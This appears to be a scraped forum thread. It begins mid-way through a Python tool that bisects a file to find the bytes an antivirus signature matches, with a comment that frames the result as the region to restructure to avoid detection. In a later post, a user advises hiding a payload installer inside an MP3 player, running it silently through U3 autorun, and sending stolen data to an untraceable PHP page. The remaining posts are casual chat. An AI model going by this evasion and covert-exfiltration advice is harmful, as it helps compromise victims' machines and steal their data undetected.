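    [start, end) that must stay intact for detection.  Assumes one contiguous
    signature; bytes that are already 0x00 inside it cannot be located this way.
    Returns None when the input is not detected at all.
    """
    n = len(data)
    if not is_detected(data):
        return None
    # smallest prefix length whose remainder can be blanked and still fire
    lo, hi = 0, n
    while lo < hi:
        mid = (lo + hi) // 2
        if is_detected(data[:mid] + b"\x00" * (n - mid)):
            hi = mid
        else:
            lo = mid + 1
    end = lo
    # largest start such that blanking everything before it still fires
    lo, hi = 0, end
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if is_detected(b"\x00" * mid + data[mid:end] + b"\x00" * (n - end)):
            lo = mid
        else:
            hi = mid - 1
    return lo, end


# Constructed demo signature: an x86 function-prologue fragment with a wildcard.
SIGNATURES = {"demo.prologue": "55 8b ec ?? 45 fc"}

# Constructed "program": padding, the flagged run, more padding.
FLAGGED = b"\x90" * 20 + b"\x55\x8b\xec\x83\x45\xfc" + b"\x90" * 10
# Same bytes with the first two swapped, as the post suggests: order broken.
REORDERED = b"\x90" * 20 + b"\x8b\x55\xec\x83\x45\xfc" + b"\x90" * 10


def demo() -> dict:
    oracle = lambda buf: bool(scan(buf, SIGNATURES))
    return {
        "flagged": scan(FLAGGED, SIGNATURES),          # [("demo.prologue", 20)]
        "reordered": scan(REORDERED, SIGNATURES),      # []
        "range": locate_detected_range(FLAGGED, oracle),  # (20, 26)
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:10}: {value}")
```

With a real scanner the oracle is the vendor's command-line engine run over a temp file, which is slow, so the bisection doing O(log n) scans instead of re-scanning after every small change is the point; the located range is then the region to restructure, and the wildcard shows why a one-byte tweak inside a '??' slot changes nothing.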
  15. You can't clone an IP address... But you can use somebody else's ;)
  16. Steve8x
    ScanDisk 16G
    Wait a minute? Did you guys say you're using a 644MB ISO image? And a 2.8GB ISO? I thought the limitation with U3 is the ISO has to be 6.66MB or less. SIX POINT SIX SIX MB. Not SIX hundred and sixty-six. I don't think I'm wrong... Maybe that is your problem? Your ISO needs to be only 6.66MB at most... It's not a big deal, though, as you could have what takes up space on the USB partition and have your 6.66MB ISO read from that...
  17. The best payload is one you have programmed yourself! Because you can customize it to do whatever you want, and it works exactly the way you want.... You really should get a U3 device so your "payload" runs automatically without user input... But if you're too cheap to, then use some clever disguise... like, for example, make the program, when the box pops up, something that seems innocent... like, don't have the popup say "click to install virus" or something like that, lol... Instead, maybe put some MP3s on your USB stick and disguise your payload installer within an MP3 player that you've made... When you run the MP3 player, it plays the MP3s while in the background your payload is being installed.... And here's a special hint from me which I use. This is the best way I have thought of to receive whatever information you're gathering from the computer... Set up a free website which offers PHP and MySQL, create a MySQL database... craft a PHP page so that when data is submitted to it, it is stored in the database... Now instead of having your payload EMAIL you, have your payload SUBMIT the data to your PHP page! Since the PHP page is server-sided, NOBODY can read the PHP code except you! Since it's a free website with false information, nothing can be traced back to you! If they try to download the PHP page, no, they won't get PHP code, only the HTML code generated by it... which you can make blank, or have a little message saying "YOU GOT PWNED". That's my take on a good payload ;)
  18. So, fishmonger! You haven't let us know how it went yet? Did it work? I've been waiting for an answer! Let us know what's up :)
  19. Ahh, I remember Harrison and his drunken talk on buffer overflows! Haha, lol, that was a funny episode! Mmmmmmmmm.... that's some good assembly code ;) lol
  20. RougeHart, ya, I'm definitely with you on that one!! Although I believe it was for PS2, wasn't it? Or was it PS1? Anyway, I think I remember it blended in with the console, black (or maybe I'm wrong and it was PS1). Well, either way, that was the best GameShark I ever used! Even if hacks for the game you played didn't exist, you could just press the button on the back and it would pause the game and you'd search for a value, and press it again to unpause it and keep going until you find the hack you're looking for! ;) Then you could save the found address onto the GameShark itself! I also had one for Dreamcast, but it sucked, the CD-swapping crap! So yeah, anyway, GameShark Pro for PS2/PS1 was my favorite console accessory. And for PC: Cheat Engine! Sort of like GameShark for the PC ;) I use Cheat Engine to find the hack addresses, then I can make a cool C++ or ASM trainer for the game!
  21. lol, this thread reminds me of my friend's computer... It has a touch screen where, instead of using the mouse, you can just click things with your fingers on the screen... You could even use it for drawing, by moving your finger around the screen... It's really neat!! But there's one problem with it: when I was over, there were some flies flying around, and you know how they are attracted to light, right? Well, they kept flying into the screen and making the mouse click everywhere, and he was, like, working on something, and the fly managed to click the X button, lol, it was pretty funny! There's gotta be a way to turn off the touch screen, but I wasn't sure how, and neither did my friend know! So that's one drawback of a touch screen: a fly could mess shit up if you're doing something on your computer... lol, at first I thought it was a virus or something where it would move the mouse around and a little bug image would be drawn on the screen, and then he was like, "Oh no, it's no virus, don't worry, it's an ACTUAL BUG!"
  22. A non-U3 device can never become a U3 device!!! U3 technology has something at the hardware level which to Windows appears as a CD-ROM drive... So in other words, there is nothing you can do with software to make it autorun! Your USB drive must have CD-ROM emulation in the hardware... So you'll have to get a U3 drive if you want TRUE autorun capability for Windows! So, bottom line, don't buy it unless it says U3!
  23. Well, personally, if/when I ever download files using torrents, after the download is done I always make sure to leave it seeding until I have at least a 1.0 ratio... I believe the ratio is how much you've downloaded compared to how much you have uploaded... So a 1.0 ratio means you have uploaded the same amount you have downloaded! So then I've done my part. I've downloaded the file from someone, and I uploaded the file to someone (in theory); really I've uploaded to many people and downloaded from many people... but the amount downloaded and uploaded equals 100% of the file... Usually, though, I just leave it running for even longer so the ratio is a lot higher (if I'm not really using the computer). Hit-and-runners are such asshats! lol... They just download the file and immediately stop seeding, even before they begin!! There are private sites out there, though, where you are forced to seed if you want to download; they keep track of your ratios and make a total ratio (I think). So the kind of software you're talking about already exists and is in use! Share a little, receive a little is the idea ;)
  24. Steve8x
    ScanDisk 16G
    3GB flat? Or 3.76GB? I've used the Universal Customizer on my 4GB Cruzer Micro, and it reads 3.76GB... I don't remember what it was before I flashed it with a custom ISO, but I'm pretty sure it was never 4GB total... All hard drives/flash drives are like that: they say a certain amount, like 500GB, but it's actually a bit less than that, like 465GB, so comparing both numbers I'd say you get about 6-7% less space than what is advertised! Why is it like that? Why do they say 500GB when it's 465GB in reality? lol. Well, anyway, maybe the Universal Customizer messes up with Cruzers larger than 4 GIG?
  25. Here's my favorite question out of the test. I scored 47, somewhat geeky ;)